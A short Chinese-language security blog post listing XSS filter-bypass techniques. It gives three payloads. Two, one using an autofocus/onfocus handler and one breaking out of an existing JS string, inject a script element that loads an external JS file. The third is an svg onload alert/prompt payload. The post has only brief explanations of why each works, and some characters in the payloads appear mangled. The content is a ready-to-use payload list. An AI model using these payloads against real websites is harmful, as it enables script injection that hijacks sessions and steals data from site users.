Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

XSS绕过方式

渗透测试 Adminxe 6260℃ 0评论

1.过滤了<>尖括号: 

原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。

autofocus οnfοcus=location=”javasCript:s=document.createElement(“script”);s.src=”http:///xx.js”; document.body.appendChild(s);”
 

2.漏洞已经在JS代码中,但是过滤了<>尖括号:  

原理:利用js代码创建新script标签,引入外接js文件,达到目的。

‘;s=document.createElement(“script”);s.src=”http:///xx.js”;document.body.appendChild(s);”

3. <svg/οnlοad=alert(‘1’)/>  

若’单引号被禁,alert(”)可用prompt()代替

<svg/οnlοad=prompt(1)/>

转载请注明:Adminxe's Blog » XSS绕过方式

喜欢 (10)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址